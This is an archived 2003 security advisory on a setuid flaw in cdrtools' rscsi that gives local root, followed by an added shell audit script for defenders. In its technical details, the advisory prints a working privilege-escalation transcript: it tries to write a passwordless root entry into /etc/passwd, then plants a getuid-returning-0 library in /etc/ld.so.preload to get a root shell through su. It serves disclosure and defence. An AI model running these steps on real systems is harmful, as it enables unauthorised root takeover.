ID SECURITYVULNS:DOC:4941 Type securityvulns Reporter Securityvulns Modified 2003-08-04T00:00:00
Description
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team research@secnetops.com
Team Lead Contact kf@secnetops.com
Our Mission:
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
Advisory Number : SRT2003-08-01-0126
Product : cdrtools (rscsi)
Version : Version <= cdrtools-2.x
Vendor : ftp://ftp.berlios.de/pub/cdrecord/
Class : local
Criticality : High
Operating System(s) : *nix
High Level Explanation
High Level Description : suid rscsi overwrites root owned files
What to do : chmod -s /opt/schily/sbin/rscsi
Technical Details
Proof Of Concept Status : SNO has PoC code for this issue
Low Level Description :
Cdrecord supports DVD-R and DVD-RW with all known DVD-writers on all UNIX-like
operating systems and on Win32.
A setuid helper binary, rscsi, allows files to be overwritten by non-root users.
A side effect of the overwrite is that the target file's permissions change so
that it becomes writable by the user who invoked rscsi. Together these issues
allow a non-root user to obtain local root on any machine with cdrtools installed.
Our initial attempt to exploit this issue failed for an unknown reason; it may
nevertheless still be a valid method of attack. The first argument passed to
rscsi selects the file that gets written to. Because rscsi also emits its own
output into the file, 0x08 (backspace) characters are used to delete some of
the characters that would otherwise be written. This method relies on placing
a line of text at the end of the target file. Note that two other lines of
garbage are also placed in the file, which may cause other problems.
elguapo@gentoo elguapo $ echo C`echo -e
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` |
/opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)
elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash
When attempting to echo this line to the password file we get the following
error. Please note that the password file IS still overwritten at this point.
E0
Illegal user id for RSCSI server
0
elguapo@gentoo elguapo $ cat /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []
We DO however have other exploitation options such as the one listed below.
[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
        return(0);
}
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0
Note that we now have write permissions to /etc/ld.so.preload
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
Time to take root
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Patch or Workaround : chmod -s /opt/schily/sbin/rscsi
Vendor Status : patched in cdrtools-2.01a18.tar.gz
Bugtraq URL : to be assigned
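The following POSIX shell functions are an added defender-side check written for this page; they are not part of the advisory or of cdrtools. They audit the two conditions the advisory chains together: an rscsi binary that still carries the setuid bit (the workaround is chmod -s), and an /etc/ld.so.preload that is writable by non-root users or that names a library which is missing, not root-owned, or writable by others. Paths and the expected owner are parameters (defaulting to the advisory's /opt/schily/sbin/rscsi, /etc/ld.so.preload and root) so the functions can be exercised against a test tree.

```shell
#!/bin/sh
# Added audit helper for the rscsi advisory above (not from cdrtools or SNO).
# Usage after sourcing:  check_rscsi_setuid; check_preload
# Both functions print findings and return 0 when something was found,
# 1 when the checked state is clean or the file is absent.

# The advisory's workaround is "chmod -s"; report if the bit is still set.
check_rscsi_setuid() {
    bin="${1:-/opt/schily/sbin/rscsi}"
    [ -e "$bin" ] || return 1
    if [ -u "$bin" ]; then
        echo "FINDING: $bin is setuid; apply: chmod -s $bin"
        return 0
    fi
    return 1
}

# Return 0 if the preload file could be abused the way the advisory abuses
# /etc/ld.so.preload: root-owned but group-writable, then pointed at a
# user-controlled .so that the dynamic loader injects into su.
# $1 = preload file, $2 = expected owner (root; overridable for tests).
check_preload() {
    f="${1:-/etc/ld.so.preload}"
    owner="${2:-root}"
    [ -e "$f" ] || return 1          # absent is the normal state
    rc=1
    if [ -n "$(find "$f" ! -user "$owner")" ]; then
        echo "FINDING: $f is not owned by $owner"; rc=0
    fi
    # -perm -020 / -002: group-write or other-write bit set
    if [ -n "$(find "$f" \( -perm -020 -o -perm -002 \))" ]; then
        echo "FINDING: $f is writable by group or others"; rc=0
    fi
    # Every listed library must exist and be owned read-only by $owner;
    # a writable or user-owned entry is exactly what the advisory leaves behind.
    while IFS= read -r lib || [ -n "$lib" ]; do
        [ -z "$lib" ] && continue
        if [ ! -e "$lib" ]; then
            echo "FINDING: $f names missing library $lib"; rc=0
        elif [ -n "$(find "$lib" \( ! -user "$owner" -o -perm -020 -o -perm -002 \))" ]; then
            echo "FINDING: $f preloads $lib, which is not $owner-owned and read-only"; rc=0
        fi
    done < "$f"
    return $rc
}
```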
This advisory was released by Secure Network Operations, Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.